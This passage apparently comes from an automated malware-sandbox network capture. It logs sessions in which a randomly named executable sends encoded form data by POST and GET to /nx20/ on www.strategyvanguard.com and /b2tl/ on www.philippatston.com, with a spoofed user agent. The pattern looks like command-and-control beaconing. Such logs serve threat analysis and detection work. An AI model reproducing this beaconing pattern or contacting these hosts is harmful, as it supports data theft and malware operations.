                                                                                                                                                    Data Raw: 50 62 47 3d 78 74 30 44 6f 49 62 49 74 72 54 4e 37 52 49 78 2f 69 36 45 76 33 35 74 53 64 39 53 73 57 57 4f 44 59 6d 6e 64 6f 56 74 4b 72 2b 34 50 59 6d 72 41 70 65 4e 64 65 71 7a 65 63 73 73 54 46 4f 45 65 61 66 66 55 34 31 43 4c 7a 41 31 30 41 2b 4c 6d 53 4f 44 57 52 55 48 4b 51 2b 44 62 72 43 64 4a 70 4e 55 68 45 50 57 6e 59 5a 73 64 63 62 33 76 52 31 4b 37 2f 57 74 35 61 5a 37 4c 66 56 4b 6a 35 30 5a 33 65 48 79 2b 37 44 54 70 55 70 56 73 5a 59 42 64 6f 48 4d 72 65 4c 36 6f 46 48 74 44 44 34 55 48 4c 45 63 31 73 74 6e 50 35 75 66 38 59 58 50 77 62 61 57 41 4b 73 38 58 2f 44 2f 39 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN7RIx/i6Ev35tSd9SsWWODYmndoVtKr+4PYmrApeNdeqzecssTFOEeaffU41CLzA10A+LmSODWRUHKQ+DbrCdJpNUhEPWnYZsdcb3vR1K7/Wt5aZ7LfVKj50Z3eHy+7DTpUpVsZYBdoHMreL6oFHtDD4UHLEc1stnP5uf8YXPwbaWAKs8X/D/9Q==
                                                                                                                                                    Oct 4, 2024 11:58:18.916870117 CEST313INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:18 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.11.2049734185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:21.432881117 CEST728OUTPOST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 78 74 30 44 6f 49 62 49 74 72 54 4e 36 79 41 78 35 42 69 45 6f 58 35 69 5a 39 39 53 31 47 57 4b 44 59 61 6e 64 70 68 48 4e 5a 61 34 4d 38 75 72 44 74 71 4e 65 65 71 7a 47 4d 73 74 51 31 50 49 65 61 43 38 55 35 4a 43 4c 33 6f 31 30 46 61 4c 6e 6c 36 41 58 42 55 4a 43 77 2b 42 47 37 43 64 4a 70 4e 55 68 45 62 77 6e 59 42 73 65 76 54 33 70 77 31 4a 6e 50 57 75 74 4b 5a 37 50 66 55 44 6a 35 30 77 33 66 62 4c 2b 35 37 54 70 56 5a 56 72 4c 77 43 45 59 48 77 6c 2b 4b 70 35 45 2b 64 61 44 41 64 47 4d 38 51 33 5a 6c 4f 4b 76 2f 46 68 71 6a 72 7a 49 47 6b 45 36 56 55 56 39 43 6b 67 63 73 4d 4a 78 74 67 45 49 77 59 78 44 37 49 78 55 51 69 2b 56 41 3d
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN6yAx5BiEoX5iZ99S1GWKDYandphHNZa4M8urDtqNeeqzGMstQ1PIeaC8U5JCL3o10FaLnl6AXBUJCw+BG7CdJpNUhEbwnYBsevT3pw1JnPWutKZ7PfUDj50w3fbL+57TpVZVrLwCEYHwl+Kp5E+daDAdGM8Q3ZlOKv/FhqjrzIGkE6VUV9CkgcsMJxtgEIwYxD7IxUQi+VA=
                                                                                                                                                    Oct 4, 2024 11:58:21.626240015 CEST313INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:21 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.11.2049735185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:24.152307987 CEST6933OUTPOST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 78 74 30 44 6f 49 62 49 74 72 54 4e 36 79 41 78 35 42 69 45 6f 58 35 69 5a 39 39 53 31 47 57 4b 44 59 61 6e 64 70 68 48 4e 5a 53 34 4d 4f 32 72 44 4d 71 4e 66 65 71 7a 4b 73 73 77 51 31 50 42 65 61 4c 31 55 35 45 2f 4c 31 51 31 33 6a 57 4c 67 52 6d 41 65 42 55 4a 64 67 2b 45 62 72 44 56 4a 70 64 51 68 45 4c 77 6e 59 42 73 65 75 6a 33 71 68 31 4a 6c 50 57 74 35 61 5a 33 4c 66 56 6d 6a 34 63 4b 33 66 66 62 2b 49 62 54 71 31 4a 56 71 34 59 43 62 6f 48 79 6f 65 4c 75 35 46 43 43 61 43 74 69 47 4d 67 70 33 65 5a 4f 47 70 4f 63 6c 34 33 50 6f 36 4f 75 41 61 5a 7a 62 65 4f 6e 2b 50 5a 78 48 58 4e 4f 45 4d 6f 77 30 78 48 6d 32 33 38 6d 73 46 67 65 51 54 35 31 53 46 5a 35 68 57 57 4c 76 2b 6d 47 34 38 33 43 58 35 48 5a 2b 52 77 6c 57 30 6f 62 6e 79 45 77 54 4e 74 2b 39 6d 4a 6f 33 6c 56 30 48 34 43 2f 6a 63 64 76 71 4f 69 70 4f 4b 75 2b 30 48 52 63 30 73 51 44 2f 4e 56 69 69 65 38 69 65 43 50 54 46 6a 4e 50 34 2f 68 56 50 6f 58 48 6e 65 39 69 31 44 65 35 4c 6e 69 41 6a 71 57 4c 34 59 4f 69 77 6d [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN6yAx5BiEoX5iZ99S1GWKDYandphHNZS4MO2rDMqNfeqzKsswQ1PBeaL1U5E/L1Q13jWLgRmAeBUJdg+EbrDVJpdQhELwnYBseuj3qh1JlPWt5aZ3LfVmj4cK3ffb+IbTq1JVq4YCboHyoeLu5FCCaCtiGMgp3eZOGpOcl43Po6OuAaZzbeOn+PZxHXNOEMow0xHm238msFgeQT51SFZ5hWWLv+mG483CX5HZ+RwlW0obnyEwTNt+9mJo3lV0H4C/jcdvqOipOKu+0HRc0sQD/NViie8ieCPTFjNP4/hVPoXHne9i1De5LniAjqWL4YOiwmna1I0nkj83RPAuWERbHwFn4X6wTg5YRhfwuRM4TAdEDjjuktSsOWJyXFvw/nSq3gBv4AkW593/98STTD6Kd56imdZgrxkTjUfU+29iWVPmmCdR4Y8NUrTdDpwZYOrgl32eCud+/Ak+7jr3ZRa4H0xfmPksITEw7LhSXkLlUOYY/Ilmu1Go4PwP+wuzPnNys+Mm4TXLE/8uZ9MJ/V0V25KUDaSOs+dfKTPyTtEzAA0yW+8IdvvDib+prE2f+VbEiyYfiYzqngg0vg0OY1XOjmHJdPqOeLt6EpwYvGFn8oT0hB0wpjktUaAXh7XCYMl9tMVM4DGrbAZjXOy8oYTuRujqyqjpwSUwPTwsMC9WI7BnCH5pEBAguZdGdKfCGz37zP8CerdlGFdMkizdyQLm3HM4td4K7wVko2OMmcDzhwWA0Sb1wOT2VMBMsylYzHy9vmMJXJTxCBqgKazkwlhOTHMRpPyiuFiu4o5U+h/ENeHG74aBkoEl1Cngr/QKazDI71v7GvmP1quJDU1SDsORh3npSdvAiKjQDTGRy3X8opBZwgBpqdb8yP66kCTd5ktvVye1RkedZ4sKFwm+58p53BztL/V4nxVjR1KbXmMYELEB019AJy6WeujrIDloVb5IZhsCfX8pmkxvrwsO48EYbVG/Sc0WPdoxTAaK [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:24.345967054 CEST313INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:24 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.11.2049736185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:26.870014906 CEST434OUTGET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:58:27.063532114 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:26 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Expires: Fri, 04 Oct 2024 10:58:26 GMT
                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                    Cache-Control: public
                                                                                                                                                    Data Raw: 31 35 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 73 74 72 61 74 65 67 79 76 61 6e 67 75 61 72 64 2e 63 6f 6d 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b [TRUNCATED]
                                                                                                                                                    Data Ascii: 1560<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.strategyvanguard.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:27.063607931 CEST1289INData Raw: 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 74
                                                                                                                                                    Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { posi
                                                                                                                                                    Oct 4, 2024 11:58:27.063683987 CEST1289INData Raw: 3c 62 72 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 6e 61 6d 65 73 68 6f 70 2e 63 6f 6d 2f 77 68 6f 69 73 22 3e 57 68 6f 20 6f 77 6e 73 20 74 68 65 20 64 6f 6d 61 69 6e 3f 3c 2f 61 3e 27 2c 0a
                                                                                                                                                    Data Ascii: <br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.strategyvanguard.com') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vr
                                                                                                                                                    Oct 4, 2024 11:58:27.063757896 CEST1289INData Raw: 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 74 22 3e 0a 20 20 20 20 20 20 20 20 77 77 77 2e 73 74 72 61
                                                                                                                                                    Data Ascii: } </script> <div class="container"> <h1 id="t"> www.strategyvanguard.com is parked </h1> <p id="m"> www.strategyvanguard.com is registered, but the owner currently does not have an
                                                                                                                                                    Oct 4, 2024 11:58:27.063819885 CEST587INData Raw: 65 72 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 0a 20 20 20 20 20 20 20 20 3e 44 6f 6d 65 6e 65 73 68 6f 70 20 41 53 20 26 63 6f 70 79 3b 0a 20 20 20 20 20 20 20 20 32 30 32 34 3c 2f 73 70 61 6e 0a 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 26 6d
                                                                                                                                                    Data Ascii: er"> <span >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 2844e36625e34a85b97e954b68aca6bc/parkedweb01 </span> </div> <script> q("ls").setAttribute("s


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    5192.168.11.2049737184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:32.391753912 CEST699OUTPOST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 72 35 41 54 2f 44 71 39 78 42 7a 4a 58 55 66 62 31 6e 6d 71 56 63 45 4d 74 61 65 65 37 36 79 76 74 6c 31 48 6a 70 49 30 53 33 7a 79 69 56 49 31 49 5a 50 6f 46 4c 43 38 6f 57 63 4f 52 56 37 66 51 70 64 49 44 55 6b 71 58 5a 41 79 65 6d 6a 59 33 43 6b 65 68 36 63 65 44 71 77 2b 74 76 74 37 6c 56 6d 71 48 76 50 75 31 38 63 50 2f 52 67 54 39 4b 34 38 76 30 30 6a 49 31 50 4f 70 71 43 7a 72 41 59 73 43 6b 46 36 70 53 58 6f 4b 36 47 7a 4c 41 66 6f 63 77 66 4d 47 77 5a 6a 4f 45 67 5a 46 71 6c 75 46 72 34 4a 47 53 7a 55 5a 65 6e 55 4a 46 70 75 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNr5AT/Dq9xBzJXUfb1nmqVcEMtaee76yvtl1HjpI0S3zyiVI1IZPoFLC8oWcORV7fQpdIDUkqXZAyemjY3Ckeh6ceDqw+tvt7lVmqHvPu18cP/RgT9K48v00jI1POpqCzrAYsCkF6pSXoK6GzLAfocwfMGwZjOEgZFqluFr4JGSzUZenUJFpuQ==
                                                                                                                                                    Oct 4, 2024 11:58:32.494491100 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:32 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:32.494594097 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 11:58:32.494687080 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 11:58:32.494780064 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 11:58:32.494930029 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 11:58:32.494992018 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 11:58:32.495083094 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 11:58:32.495146990 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
